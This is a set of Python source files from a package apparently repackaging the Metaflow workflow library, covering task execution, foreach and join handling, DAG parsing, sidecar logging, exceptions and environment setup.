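counter = Counter('persist_counter', {'flow_name': 'MyFlow'})
counter.increment()
restored = deserialize_metric(counter.to_dict())
assert isinstance(restored, Counter) and restored.value == 1
return restored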
def get_monitor_msg_type(msg):
if msg.payload.get('gauge') is not None:
return GAUGE_TYPE
if msg.payload.get('counter') is not None:
if msg.payload.get('timer') is not None:
return MEASURE_TYPE
return COUNTER_TYPE | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/monitor.py | monitor.py |
from __future__ import print_function
import sys
import os
import time
from .metaflow_config import MAX_ATTEMPTS
from .metadata import MetaDatum
from .datastore import Inputs, MetaflowDatastoreSet
from .exception import MetaflowInternalError,\
MetaflowDataMissing,\
MetaflowExceptionWrapper
from .util import all_equal,\
get_username,\
resolve_identity
from .current import current
from collections import namedtuple
ForeachFrame = namedtuple('ForeachFrame',
['step', 'var', 'num_splits', 'index'])
class MetaflowTask(object):
"""
MetaflowTask prepares a Flow instance for execution of a single step.
"""
def __init__(self,
flow,
datastore,
metadata,
environment,
console_logger,
event_logger,
monitor):
self.flow = flow
self.datastore = datastore
self.metadata = metadata
self.environment = environment
self.console_logger = console_logger
self.event_logger = event_logger
self.monitor = monitor
def _exec_step_function(self, step_function, input_obj=None):
self.environment.validate_environment(logger=self.console_logger)
if input_obj is None:
step_function()
else:
step_function(input_obj)
def _init_parameters(self, parameter_ds):
# overwrite Parameters in the flow object
vars = []
for var, param in self.flow._get_parameters():
# make the parameter a read-only property
# note x=x binds the current value of x to the closure
def property_setter(_, cls=self.flow.__class__, var=var, parameter_ds=parameter_ds):
v = parameter_ds[var]
setattr(cls, var, property(fget=lambda _, val=v: val))
return v
setattr(self.flow.__class__, var,
property(fget=property_setter))
vars.append(var)
self.flow._datastore.passdown_partial(parameter_ds, vars)
def _init_data(self, run_id, join_type, input_paths):
# We prefer to use the parallelized version to initialize datastores
# (via MetaflowDatastoreSet) only with more than 4 datastores, because
# the baseline overhead of using the set is ~1.5s and each datastore
# init takes ~200-300ms when run sequentially.
if len(input_paths) > 4:
prefetch_data_artifacts = None
if join_type and join_type == 'foreach':
# Prefetch 'foreach' related artifacts to improve time taken by
# _init_foreach.
prefetch_data_artifacts = \
['_foreach_stack', '_foreach_num_splits', '_foreach_var']
# Note: Specify `pathspecs` while creating the datastore set to
# guarantee strong consistency and guard against missing input.
datastore_set = \
MetaflowDatastoreSet(self.datastore,
self.flow.name,
run_id,
pathspecs=input_paths,
metadata=self.metadata,
event_logger=self.event_logger,
monitor=self.monitor,
prefetch_data_artifacts=prefetch_data_artifacts)
ds_list = [ds for ds in datastore_set]
if len(ds_list) != len(input_paths):
raise MetaflowDataMissing("Some input datastores are missing. "
"Expected: %d Actual: %d" %
(len(input_paths), len(ds_list)))
else:
# initialize directly in the single input case.
ds_list = []
for input_path in input_paths:
run_id, step_name, task_id = input_path.split('/')
ds_list.append(
self.datastore(self.flow.name,
run_id=run_id,
step_name=step_name,
task_id=task_id,
metadata=self.metadata,
event_logger=self.event_logger,
monitor=self.monitor))
if not ds_list:
# this guards against errors in input paths
raise MetaflowDataMissing("Input paths *%s* resolved to zero "
"inputs" % ','.join(input_paths))
return ds_list
def _init_foreach(self, step_name, join_type, inputs, split_index):
# these variables are only set by the split step in the output
# data. They don't need to be accessible in the flow.
self.flow._foreach_var = None
self.flow._foreach_num_splits = None
# There are three cases that can alter the foreach state:
# 1) start - initialize an empty foreach stack
# 2) join - pop the topmost frame from the stack
# 3) step following a split - push a new frame in the stack
# case 1) - reset the stack
if step_name == 'start':
self.flow._foreach_stack = []
# case 2) - this is a join step
elif join_type:
# assert the lineage of incoming branches
def lineage():
for i in inputs:
if join_type == 'foreach':
top = i['_foreach_stack'][-1]
bottom = i['_foreach_stack'][:-1]
# the topmost indices in the stack are all
# different naturally, so ignore them in the
# assertion
yield bottom + [top._replace(index=0)]
else:
yield i['_foreach_stack']
if not all_equal(lineage()):
raise MetaflowInternalError("Step *%s* tried to join branches "
"whose lineages don't match."
% step_name)
# assert that none of the inputs are splits - we don't
# allow empty foreaches (joins immediately following splits)
if any(not i.is_none('_foreach_var') for i in inputs):
raise MetaflowInternalError("Step *%s* tries to join a foreach "
"split with no intermediate steps."
% step_name)
inp = inputs[0]
if join_type == 'foreach':
# Make sure that the join got all splits as its inputs.
# Datastore.resolve() leaves out all undone tasks, so if
# something strange happened upstream, the inputs list
# may not contain all inputs which should raise an exception
stack = inp['_foreach_stack']
if len(inputs) != stack[-1].num_splits:
raise MetaflowDataMissing("Foreach join *%s* expected %d "
"splits but only %d inputs were "
"found" % (step_name,
stack[-1].num_splits,
len(inputs)))
# foreach-join pops the topmost frame from the stack
self.flow._foreach_stack = stack[:-1]
else:
# a non-foreach join doesn't change the stack
self.flow._foreach_stack = inp['_foreach_stack']
# case 3) - our parent was a split. Initialize a new foreach frame.
elif not inputs[0].is_none('_foreach_var'):
if len(inputs) != 1:
raise MetaflowInternalError("Step *%s* got multiple inputs "
"although it follows a split step."
% step_name)
if split_index is None:
raise MetaflowInternalError("Step *%s* follows a split step "
"but no split_index is "
"specified." % step_name)
# push a new index after a split to the stack
frame = ForeachFrame(step_name,
inputs[0]['_foreach_var'],
inputs[0]['_foreach_num_splits'],
split_index)
stack = inputs[0]['_foreach_stack']
stack.append(frame)
self.flow._foreach_stack = stack
def _clone_flow(self, datastore):
x = self.flow.__class__(use_cli=False)
x._set_datastore(datastore)
return x
def clone_only(self, step_name, run_id, task_id, clone_origin_task):
if not clone_origin_task:
raise MetaflowInternalError("task.clone_only needs a valid "
"clone_origin_task value.")
# 1. initialize output datastore
output = self.datastore(self.flow.name,
run_id=run_id,
step_name=step_name,
task_id=task_id,
mode='w',
metadata=self.metadata,
attempt=0,
event_logger=self.event_logger,
monitor=self.monitor)
origin_run_id, origin_step_name, origin_task_id =\
clone_origin_task.split('/')
# 2. initialize origin datastore
origin = self.datastore(self.flow.name,
run_id=origin_run_id,
step_name=origin_step_name,
task_id=origin_task_id,
metadata=self.metadata,
event_logger=self.event_logger,
monitor=self.monitor)
output.clone(origin)
output.done()
def run_step(self,
step_name,
run_id,
task_id,
origin_run_id,
input_paths,
split_index,
retry_count,
max_user_code_retries):
if run_id and task_id:
self.metadata.register_run_id(run_id)
self.metadata.register_task_id(run_id, step_name, task_id)
else:
raise MetaflowInternalError("task.run_step needs a valid run_id "
"and task_id")
if retry_count >= MAX_ATTEMPTS:
# any results with an attempt ID >= MAX_ATTEMPTS will be ignored
# by datastore, so running a task with such a retry count would
# be pointless and dangerous
raise MetaflowInternalError("Too many task attempts (%d)! "
"MAX_ATTEMPTS exceeded." % retry_count)
self.metadata.register_metadata(run_id,
step_name,
task_id,
[MetaDatum(field='attempt',
value=str(retry_count),
type='attempt'),
MetaDatum(field='origin-run-id',
value=str(origin_run_id),
type='origin-run-id')])
step_func = getattr(self.flow, step_name)
node = self.flow._graph[step_name]
join_type = None
if node.type == 'join':
join_type = self.flow._graph[node.split_parents[-1]].type
# 1. initialize output datastore
output = self.datastore(self.flow.name,
run_id=run_id,
step_name=step_name,
task_id=task_id,
mode='w',
metadata=self.metadata,
attempt=retry_count,
event_logger=self.event_logger,
monitor=self.monitor)
if input_paths:
# 2. initialize input datastores
inputs = self._init_data(run_id, join_type, input_paths)
# 3. initialize foreach state
self._init_foreach(step_name, join_type, inputs, split_index)
# 4. initialize the current singleton
current._set_env(self.flow.name,
run_id,
step_name,
task_id,
origin_run_id,
resolve_identity(),
get_username())
# 5. run task
output.save_metadata('task_begin', {
'code_package_sha': os.environ.get('METAFLOW_CODE_SHA'),
'code_package_ds': os.environ.get('METAFLOW_CODE_DS'),
'code_package_url': os.environ.get('METAFLOW_CODE_URL'),
'retry_count': retry_count
})
logger = self.event_logger
start = time.time()
try:
# init side cars
logger.start()
msg = {
"task_id": task_id,
"msg": 'task starting',
"step_name": step_name,
"run_id": run_id,
"flow_name": self.flow.name,
"ts": round(time.time())
}
logger.log(msg)
self.flow._current_step = step_name
self.flow._success = False
self.flow._task_ok = None
self.flow._exception = None
# Note: All internal flow attributes (ie: non-user artifacts)
# should either be set prior to running the user code or listed in
# FlowSpec._EPHEMERAL to allow for proper merging/importing of
# user artifacts in the user's step code.
decorators = step_func.decorators
for deco in decorators:
deco.task_pre_step(step_name,
output,
self.metadata,
run_id,
task_id,
self.flow,
self.flow._graph,
retry_count,
max_user_code_retries)
# decorators can actually decorate the step function,
# or they can replace it altogether. This functionality
# is used e.g. by catch_decorator which switches to a
# fallback code if the user code has failed too many
# times.
step_func = deco.task_decorate(step_func,
self.flow,
self.flow._graph,
retry_count,
max_user_code_retries)
if join_type:
# Join step:
# Ensure that we have the right number of inputs. The
# foreach case is checked above.
if join_type != 'foreach' and\
len(inputs) != len(node.in_funcs):
raise MetaflowDataMissing("Join *%s* expected %d "
"inputs but only %d inputs "
"were found"
% (step_name,
len(node.in_funcs),
len(inputs)))
# Multiple input contexts are passed in as an argument
# to the step function.
input_obj = Inputs(self._clone_flow(inp) for inp in inputs)
self.flow._set_datastore(output)
# initialize parameters (if they exist)
# We take Parameter values from the first input,
# which is always safe since parameters are read-only
self._init_parameters(inputs[0])
self._exec_step_function(step_func, input_obj)
else:
# Linear step:
# We are running with a single input context.
# The context is embedded in the flow.
if len(inputs) > 1:
# This should be captured by static checking but
# let's assert this again
raise MetaflowInternalError("Step *%s* is not a join "
"step but it gets multiple "
"inputs." % step_name)
self.flow._set_datastore(inputs[0])
if input_paths:
# initialize parameters (if they exist)
# We take Parameter values from the first input,
# which is always safe since parameters are read-only
self._init_parameters(inputs[0])
self._exec_step_function(step_func)
for deco in decorators:
deco.task_post_step(step_name,
self.flow,
self.flow._graph,
retry_count,
max_user_code_retries)
self.flow._task_ok = True
self.flow._success = True
except Exception as ex:
tsk_msg = {
"task_id": task_id,
"exception_msg": str(ex),
"msg": 'task failed with exception',
"step_name": step_name,
"run_id": run_id,
"flow_name": self.flow.name
}
logger.log(tsk_msg)
exception_handled = False
for deco in decorators:
res = deco.task_exception(ex,
step_name,
self.flow,
self.flow._graph,
retry_count,
max_user_code_retries)
exception_handled = bool(res) or exception_handled
if exception_handled:
self.flow._task_ok = True
else:
self.flow._task_ok = False
self.flow._exception = MetaflowExceptionWrapper(ex)
print('%s failed:' % self.flow, file=sys.stderr)
raise
finally:
end = time.time() - start
msg = {
"task_id": task_id,
"msg": 'task ending',
"step_name": step_name,
"run_id": run_id,
"flow_name": self.flow.name,
"ts": round(time.time()),
"runtime": round(end)
}
logger.log(msg)
output.save_metadata('task_end', {})
output.persist(self.flow)
# terminate side cars
logger.terminate()
# this writes a success marker indicating that the
# "transaction" is done
output.done()
# final decorator hook: The task results are now
# queryable through the client API / datastore
for deco in decorators:
deco.task_finished(step_name,
self.flow,
self.flow._graph,
self.flow._task_ok,
retry_count,
max_user_code_retries)
# This file is imported from https://github.com/aebrahim/python-git-version
from __future__ import print_function
from subprocess import check_output, CalledProcessError
from os import path, name, devnull, environ, listdir
__all__ = ("get_version",)
CURRENT_DIRECTORY = path.dirname(path.abspath(__file__))
VERSION_FILE = path.join(CURRENT_DIRECTORY, "VERSION")
GIT_COMMAND = "git"
if name == "nt":
def find_git_on_windows():
"""find the path to the git executable on windows"""
# first see if git is in the path
try:
check_output(["where", "/Q", "git"])
# if this command succeeded, git is in the path
return "git"
# catch the exception thrown if git was not found
except CalledProcessError:
pass
# There are several locations git.exe may be hiding
possible_locations = []
# look in program files for msysgit
if "PROGRAMFILES(X86)" in environ:
possible_locations.append("%s/Git/cmd/git.exe" %
environ["PROGRAMFILES(X86)"])
if "PROGRAMFILES" in environ:
possible_locations.append("%s/Git/cmd/git.exe" %
environ["PROGRAMFILES"])
# look for the github version of git
if "LOCALAPPDATA" in environ:
github_dir = "%s/GitHub" % environ["LOCALAPPDATA"]
if path.isdir(github_dir):
for subdir in listdir(github_dir):
if not subdir.startswith("PortableGit"):
continue
possible_locations.append("%s/%s/bin/git.exe" %
(github_dir, subdir))
for possible_location in possible_locations:
if path.isfile(possible_location):
return possible_location
# git was not found
return "git"
GIT_COMMAND = find_git_on_windows()
def call_git_describe(abbrev=7):
"""return the string output of git desribe"""
try:
# first, make sure we are actually in a Metaflow repo,
# not some other repo
with open(devnull, 'w') as fnull:
arguments = [GIT_COMMAND, "rev-parse", "--show-toplevel"]
reponame = check_output(arguments, cwd=CURRENT_DIRECTORY,
stderr=fnull).decode("ascii").strip()
if path.basename(reponame) != 'metaflow':
return None
with open(devnull, "w") as fnull:
arguments = [GIT_COMMAND, "describe", "--tags",
"--abbrev=%d" % abbrev]
return check_output(arguments, cwd=CURRENT_DIRECTORY,
stderr=fnull).decode("ascii").strip()
except (OSError, CalledProcessError):
return None
def format_git_describe(git_str, pep440=False):
"""format the result of calling 'git describe' as a python version"""
if git_str is None:
return None
if "-" not in git_str: # currently at a tag
return git_str
else:
# formatted as version-N-githash
# want to convert to version.postN-githash
git_str = git_str.replace("-", ".post", 1)
if pep440: # does not allow git hash afterwards
return git_str.split("-")[0]
else:
return git_str.replace("-g", "+git")
def read_release_version():
"""Read version information from VERSION file"""
try:
with open(VERSION_FILE, "r") as infile:
version = str(infile.read().strip())
if len(version) == 0:
version = None
return version
except IOError:
return None
def update_release_version():
"""Update VERSION file"""
version = get_version(pep440=True)
with open(VERSION_FILE, "w") as outfile:
outfile.write(version)
outfile.write("\n")
def get_version(pep440=False):
"""Tracks the version number.
pep440: bool
When True, this function returns a version string suitable for
a release as defined by PEP 440. When False, the githash (if
available) will be appended to the version string.
The file VERSION holds the version information. If this is not a git
repository, then it is reasonable to assume that the version is not
being incremented and the version returned will be the release version as
read from the file.
However, if the script is located within an active git repository,
git-describe is used to get the version information.
The file VERSION will need to be changed manually. This should be done
before running git tag (set to the same as the version in the tag).
"""
git_version = format_git_describe(call_git_describe(), pep440=pep440)
if git_version is None: # not a git repository
import metaflow
return metaflow.__version__
else:
        return git_version
import inspect
import ast
import re
def deindent_docstring(doc):
if doc:
return re.sub(r'\n[\t ]+', '\n', doc).strip()
else:
return ''
class DAGNode(object):
def __init__(self, func_ast, decos, doc):
self.name = func_ast.name
self.func_lineno = func_ast.lineno
self.decorators = decos
self.doc = deindent_docstring(doc)
# these attributes are populated by _parse
self.tail_next_lineno = 0
self.type = None
self.out_funcs = []
self.has_tail_next = False
self.invalid_tail_next = False
self.num_args = 0
self.condition = None
self.foreach_param = None
self._parse(func_ast)
# these attributes are populated by _traverse_graph
self.in_funcs = set()
self.split_parents = []
self.matching_join = None
# these attributes are populated by _postprocess
self.is_inside_foreach = False
def _expr_str(self, expr):
return '%s.%s' % (expr.value.id, expr.attr)
def _parse(self, func_ast):
self.num_args = len(func_ast.args.args)
tail = func_ast.body[-1]
# end doesn't need a transition
if self.name == 'end':
# TYPE: end
self.type = 'end'
        # ensure that the tail is an expression
if not isinstance(tail, ast.Expr):
return
# determine the type of self.next transition
try:
if not self._expr_str(tail.value.func) == 'self.next':
return
self.has_tail_next = True
self.invalid_tail_next = True
self.tail_next_lineno = tail.lineno
self.out_funcs = [e.attr for e in tail.value.args]
keywords = dict((k.arg, k.value.s) for k in tail.value.keywords)
if len(keywords) == 1:
if 'foreach' in keywords:
# TYPE: foreach
self.type = 'foreach'
if len(self.out_funcs) == 1:
self.foreach_param = keywords['foreach']
self.invalid_tail_next = False
elif 'condition' in keywords:
# TYPE: split-or
self.type = 'split-or'
if len(self.out_funcs) == 2:
self.condition = keywords['condition']
self.invalid_tail_next = False
elif len(keywords) == 0:
if len(self.out_funcs) > 1:
# TYPE: split-and
self.type = 'split-and'
self.invalid_tail_next = False
elif len(self.out_funcs) == 1:
# TYPE: linear
if self.num_args > 1:
self.type = 'join'
else:
self.type = 'linear'
self.invalid_tail_next = False
except AttributeError:
return
def __str__(self):
return\
"""*[{0.name} {0.type} (line {0.func_lineno})]*
in_funcs={in_funcs}
split_parents={parents}
matching_join={matching_join}
is_inside_foreach={is_inside_foreach}
decorators={decos}
num_args={0.num_args}
has_tail_next={0.has_tail_next} (line {0.tail_next_lineno})
invalid_tail_next={0.invalid_tail_next}
condition={0.condition}
foreach_param={0.foreach_param}
-> {out}"""\
.format(self,
matching_join=self.matching_join and '[%s]' % self.matching_join,
is_inside_foreach=self.is_inside_foreach,
in_funcs=', '.join('[%s]' % x for x in self.in_funcs),
parents=', '.join('[%s]' % x for x in self.split_parents),
decos=' | '.join(map(str, self.decorators)),
out=', '.join('[%s]' % x for x in self.out_funcs))
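# The parser above maps `self.next(...)` calls to transition types roughly as
# follows (the step bodies below are illustrative, not from this module):
#   self.next(self.a, self.b)                   -> 'split-and'
#   self.next(self.a, self.b, condition='cond') -> 'split-or'
#   self.next(self.process, foreach='items')    -> 'foreach'
#   self.next(self.a)                           -> 'linear', or 'join' when the
#                                                  step function takes an extra
#                                                  `inputs` argument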
class StepVisitor(ast.NodeVisitor):
def __init__(self, nodes, flow):
self.nodes = nodes
self.flow = flow
super(StepVisitor, self).__init__()
def visit_FunctionDef(self, node):
func = getattr(self.flow, node.name)
if hasattr(func, 'is_step'):
self.nodes[node.name] = DAGNode(node, func.decorators, func.__doc__)
class FlowGraph(object):
def __init__(self, flow):
self.name = flow.__name__
self.nodes = self._create_nodes(flow)
self.doc = deindent_docstring(flow.__doc__)
self._traverse_graph()
self._postprocess()
def _create_nodes(self, flow):
module = __import__(flow.__module__)
tree = ast.parse(inspect.getsource(module)).body
root = [n for n in tree\
if isinstance(n, ast.ClassDef) and n.name == self.name][0]
nodes = {}
StepVisitor(nodes, flow).visit(root)
return nodes
def _postprocess(self):
        # any node that has a foreach as any of its split parents
# has is_inside_foreach=True *unless* all of those foreaches
# are joined by the node
for node in self.nodes.values():
foreaches = [p for p in node.split_parents
if self.nodes[p].type == 'foreach']
if [f for f in foreaches
if self.nodes[f].matching_join != node.name]:
node.is_inside_foreach = True
def _traverse_graph(self):
def traverse(node, seen, split_parents):
if node.type in ('split-or', 'split-and', 'foreach'):
node.split_parents = split_parents
split_parents = split_parents + [node.name]
elif node.type == 'join':
# ignore joins without splits
if split_parents:
self[split_parents[-1]].matching_join = node.name
node.split_parents = split_parents
split_parents = split_parents[:-1]
else:
node.split_parents = split_parents
for n in node.out_funcs:
# graph may contain loops - ignore them
if n not in seen:
# graph may contain unknown transitions - ignore them
if n in self:
child = self[n]
child.in_funcs.add(node.name)
traverse(child, seen + [n], split_parents)
if 'start' in self:
traverse(self['start'], [], [])
# fix the order of in_funcs
for node in self.nodes.values():
node.in_funcs = sorted(node.in_funcs)
def __getitem__(self, x):
return self.nodes[x]
def __contains__(self, x):
return x in self.nodes
def __iter__(self):
return iter(self.nodes.values())
def __str__(self):
return '\n'.join(str(n) for _, n in sorted((n.func_lineno, n)\
for n in self.nodes.values()))
def output_dot(self):
def edge_specs():
for node in self.nodes.values():
for edge in node.out_funcs:
yield '%s -> %s;' % (node.name, edge)
def node_specs():
for node in self.nodes.values():
nodetype = 'join' if node.num_args > 1 else node.type
yield '"{0.name}"'\
'[ label = <<b>{0.name}</b> | <font point-size="10">{type}</font>> '\
' fontname = "Helvetica" '\
' shape = "record" ];'.format(node, type=nodetype)
return "digraph {0.name} {{\n"\
"rankdir=LR;\n"\
"{nodes}\n"\
"{edges}\n"\
"}}".format(self,
nodes='\n'.join(node_specs()),
                           edges='\n'.join(edge_specs()))
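# Minimal usage sketch (assumes MyFlow is a FlowSpec subclass importable here):
#
#   graph = FlowGraph(MyFlow)
#   print(graph)               # per-node summary, ordered by source line number
#   print(graph.output_dot())  # GraphViz source; render with `dot -Tpng -o graph.png`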
from __future__ import print_function
import subprocess
import fcntl
import select
import os
import sys
import platform
from fcntl import F_SETFL
from os import O_NONBLOCK
from .sidecar_messages import Message, MessageTypes
from .debug import debug
MESSAGE_WRITE_TIMEOUT_IN_MS = 1000
NULL_SIDECAR_PREFIX = "nullSidecar"
# for python 2 compatibility
try:
blockingError = BlockingIOError
except:
blockingError = OSError
class PipeUnavailableError(Exception):
"""raised when unable to write to pipe given allotted time"""
pass
class NullSidecarError(Exception):
"""raised when tyring to poll or interact with the fake subprocess in the null sidecar"""
pass
class MsgTimeoutError(Exception):
"""raised when tyring unable to send message to sidecar in allocated time"""
pass
class NullPoller(object):
def poll(self, timeout):
raise NullSidecarError()
class SidecarSubProcess(object):
def __init__(self, worker_type):
# type: (str) -> None
self.__worker_type = worker_type
self.__process = None
self.__poller = None
self.start()
def start(self):
if (self.__worker_type is not None and \
self.__worker_type.startswith(NULL_SIDECAR_PREFIX)) or \
platform.system() == 'Darwin':
self.__poller = NullPoller()
else:
from select import poll
python_version = sys.executable
cmdline = [python_version,
'-u',
os.path.dirname(__file__) + '/sidecar_worker.py',
self.__worker_type]
debug.sidecar_exec(cmdline)
self.__process = self.__start_subprocess(cmdline)
if self.__process is not None:
fcntl.fcntl(self.__process.stdin, F_SETFL, O_NONBLOCK)
self.__poller = poll()
self.__poller.register(self.__process.stdin.fileno(),
select.POLLOUT)
else:
# unable to start subprocess, fallback to Null sidecar
self.logger("unable to start subprocess for sidecar %s"
% self.__worker_type)
self.__poller = NullPoller()
def __start_subprocess(self, cmdline):
for i in range(3):
try:
return subprocess.Popen(cmdline,
stdin=subprocess.PIPE,
stdout=open(os.devnull, 'w'),
bufsize=0)
except blockingError as be:
self.logger("warning: sidecar popen failed: %s" % repr(be))
except Exception as e:
self.logger(repr(e))
break
def kill(self):
try:
msg = Message(MessageTypes.SHUTDOWN, None)
self.emit_msg(msg)
except:
pass
def emit_msg(self, msg):
msg_ser = msg.serialize().encode('utf-8')
written_bytes = 0
while written_bytes < len(msg_ser):
try:
fds = self.__poller.poll(MESSAGE_WRITE_TIMEOUT_IN_MS)
if fds is None or len(fds) == 0:
raise MsgTimeoutError("poller timed out")
for fd, event in fds:
if event & select.POLLERR:
raise PipeUnavailableError('pipe unavailable')
f = os.write(fd, msg_ser[written_bytes:])
written_bytes += f
except NullSidecarError:
# sidecar is disabled, ignore all messages
break
def msg_handler(self, msg, retries=3):
try:
self.emit_msg(msg)
except MsgTimeoutError:
# drop message, do not retry on timeout
self.logger("unable to send message due to timeout")
except Exception as ex:
if isinstance(ex, PipeUnavailableError):
self.logger("restarting sidecar %s" % self.__worker_type)
self.start()
if retries > 0:
self.logger("retrying msg send to sidecar")
self.msg_handler(msg, retries-1)
else:
self.logger("error sending log message")
self.logger(repr(ex))
def logger(self, msg):
print("metaflow logger: " + msg, file=sys.stderr) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/sidecar.py | sidecar.py |
import sys
import traceback
# worker processes that exit with this exit code are not retried
METAFLOW_EXIT_DISALLOW_RETRY = 202
# worker processes that exit with this code should be retried (if retry counts left)
METAFLOW_EXIT_ALLOW_RETRY = 203
class MetaflowExceptionWrapper(Exception):
def __init__(self, exc=None):
if exc is not None:
self.exception = str(exc)
self.type = '%s.%s' % (exc.__class__.__module__,
exc.__class__.__name__)
if sys.exc_info()[0] is None:
self.stacktrace = None
else:
self.stacktrace = traceback.format_exc()
# Base Exception defines its own __reduce__ and __setstate__
# which don't work nicely with derived exceptions. We override
# the magic methods related to pickle to get desired behavior.
def __reduce__(self):
return MetaflowExceptionWrapper, (None,), self.__dict__
def __getstate__(self):
return self.__dict__
def __setstate__(self, state):
self.__dict__ = state
def __str__(self):
if self.stacktrace:
return self.stacktrace
else:
return '[no stacktrace]\n%s: %s' % (self.type, self.exception)
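# Pickle round-trip sketch: the wrapper stays picklable even if the original
# exception class is not importable where it is unpickled.
#
#   try:
#       raise ValueError("boom")
#   except ValueError as ex:
#       wrapped = MetaflowExceptionWrapper(ex)
#   import pickle
#   restored = pickle.loads(pickle.dumps(wrapped))
#   restored.type       # 'builtins.ValueError' on Python 3
#   restored.exception  # 'boom'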
class MetaflowException(Exception):
headline = 'Flow failed'
def __init__(self, msg='', lineno=None):
self.message = msg
self.line_no = lineno
super(MetaflowException, self).__init__()
def __str__(self):
prefix = 'line %d: ' % self.line_no if self.line_no else ''
return '%s%s' % (prefix, self.message)
class ParameterFieldFailed(MetaflowException):
headline = "Parameter field failed"
def __init__(self, name, field):
exc = traceback.format_exc()
msg = "When evaluating the field *%s* for the Parameter *%s*, "\
"the following exception occurred:\n\n%s" % (field, name, exc)
super(ParameterFieldFailed, self).__init__(msg)
class ParameterFieldTypeMismatch(MetaflowException):
headline = "Parameter field with a mismatching type"
def __init__(self, msg):
super(ParameterFieldTypeMismatch, self).__init__(msg)
class ExternalCommandFailed(MetaflowException):
headline = "External command failed"
def __init__(self, msg):
super(ExternalCommandFailed, self).__init__(msg)
class MetaflowNotFound(MetaflowException):
headline = 'Object not found'
class MetaflowNamespaceMismatch(MetaflowException):
headline = 'Object not in the current namespace'
def __init__(self, namespace):
msg = "Object not in namespace '%s'" % namespace
super(MetaflowNamespaceMismatch, self).__init__(msg)
class MetaflowInternalError(MetaflowException):
headline = 'Internal error'
class MetaflowUnknownUser(MetaflowException):
headline = 'Unknown user'
def __init__(self):
msg = "Metaflow could not determine your user name based on "\
"environment variables ($USERNAME etc.)"
super(MetaflowUnknownUser, self).__init__(msg)
class InvalidDecoratorAttribute(MetaflowException):
headline = "Unknown decorator attribute"
def __init__(self, deconame, attr, defaults):
msg = "Decorator '{deco}' does not support the attribute '{attr}'. "\
"These attributes are supported: {defaults}."\
.format(deco=deconame,
attr=attr,
defaults=', '.join(defaults))
super(InvalidDecoratorAttribute, self).__init__(msg)
class CommandException(MetaflowException):
headline = "Invalid command"
class MetaflowDataMissing(MetaflowException):
headline = "Data missing"
class MergeArtifactsException(MetaflowException):
headline = "Unhandled artifacts in merge"
def __init__(self, msg, unhandled):
super(MergeArtifactsException, self).__init__(msg)
        self.artifact_names = unhandled
import os
import platform
import sys
from .util import get_username, to_unicode
from . import metaflow_version
from metaflow.exception import MetaflowException
version_cache = None
class InvalidEnvironmentException(MetaflowException):
headline = 'Incompatible environment'
class MetaflowEnvironment(object):
TYPE = 'local'
def __init__(self, flow):
pass
def init_environment(self, logger):
"""
Run before any step decorators are initialized.
"""
pass
def validate_environment(self, logger):
"""
Run before any command to validate that we are operating in
a desired environment.
"""
pass
def decospecs(self):
"""
Environment may insert decorators, equivalent to setting --with
options on the command line.
"""
return ()
def bootstrap_commands(self, step_name):
"""
A list of shell commands to bootstrap this environment in a remote runtime.
"""
return []
def add_to_package(self):
"""
A list of tuples (file, arcname) to add to the job package.
        `arcname` is an alternative name for the file in the job package.
"""
return []
def pylint_config(self):
"""
Environment may override pylint config.
"""
return []
@classmethod
def get_client_info(cls, flow_name, metadata):
"""
Environment may customize the information returned to the client about the environment
Parameters
----------
flow_name : str
Name of the flow
metadata : dict
Metadata information regarding the task
Returns
-------
str : Information printed and returned to the user
"""
return "Local environment"
def get_package_commands(self, code_package_url):
cmds = ["set -e",
"echo \'Setting up task environment.\'",
"%s -m pip install awscli click requests boto3 \
--user -qqq" % self._python(),
"mkdir metaflow",
"cd metaflow",
"i=0; while [ $i -le 5 ]; do "
"echo \'Downloading code package.\'; "
"%s -m awscli s3 cp %s job.tar >/dev/null && \
echo \'Code package downloaded.\' && break; "
"sleep 10; i=$((i+1));"
"done " % (self._python(), code_package_url),
"tar xf job.tar"
]
return cmds
def get_environment_info(self):
global version_cache
if version_cache is None:
version_cache = metaflow_version.get_version()
# note that this dict goes into the code package
# so variables here should be relatively stable (no
# timestamps) so the hash won't change all the time
env = {'platform': platform.system(),
'username': get_username(),
'production_token': os.environ.get('METAFLOW_PRODUCTION_TOKEN'),
'runtime': os.environ.get('METAFLOW_RUNTIME_NAME', 'dev'),
'app': os.environ.get('APP'),
'environment_type': self.TYPE,
'python_version': sys.version,
'python_version_code': '%d.%d.%d' % sys.version_info[:3],
'metaflow_version': version_cache,
'script': os.path.basename(os.path.abspath(sys.argv[0]))}
return env
def executable(self, step_name):
return self._python()
def _python(self):
return "python" | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/environment.py | environment.py |
import os
import sys
import inspect
import traceback
from functools import partial, wraps
from datetime import datetime
import click
from . import lint
from . import plugins
from . import parameters
from . import decorators
from . import metaflow_version
from . import namespace
from .util import resolve_identity, decompress_list, write_latest_run_id, get_latest_run_id
from .task import MetaflowTask
from .exception import CommandException, MetaflowException
from .graph import FlowGraph
from .datastore import DATASTORES
from .runtime import NativeRuntime
from .package import MetaflowPackage
from .plugins import LOGGING_SIDECAR, MONITOR_SIDECAR
from .metadata import METADATAPROVIDERS
from .metaflow_config import DEFAULT_DATASTORE, DEFAULT_METADATA
from .plugins import ENVIRONMENTS
from .environment import MetaflowEnvironment
from .pylint_wrapper import PyLint
from .event_logger import EventLogger
from .monitor import Monitor
ERASE_TO_EOL = '\033[K'
HIGHLIGHT = 'red'
INDENT = ' ' * 4
LOGGER_TIMESTAMP = 'magenta'
LOGGER_COLOR = 'green'
LOGGER_BAD_COLOR = 'red'
try:
# Python 2
import cPickle as pickle
except:
# Python 3
import pickle
def echo_dev_null(*args, **kwargs):
pass
def echo_always(line, **kwargs):
kwargs['err'] = kwargs.get('err', True)
if kwargs.pop('indent', None):
line = '\n'.join(INDENT + x for x in line.splitlines())
if 'nl' not in kwargs or kwargs['nl']:
line += ERASE_TO_EOL
top = kwargs.pop('padding_top', None)
bottom = kwargs.pop('padding_bottom', None)
highlight = kwargs.pop('highlight', HIGHLIGHT)
if top:
click.secho(ERASE_TO_EOL, **kwargs)
hl_bold = kwargs.pop('highlight_bold', True)
nl = kwargs.pop('nl', True)
fg = kwargs.pop('fg', None)
bold = kwargs.pop('bold', False)
kwargs['nl'] = False
hl = True
nobold = kwargs.pop('no_bold', False)
if nobold:
click.secho(line, **kwargs)
else:
for span in line.split('*'):
if hl:
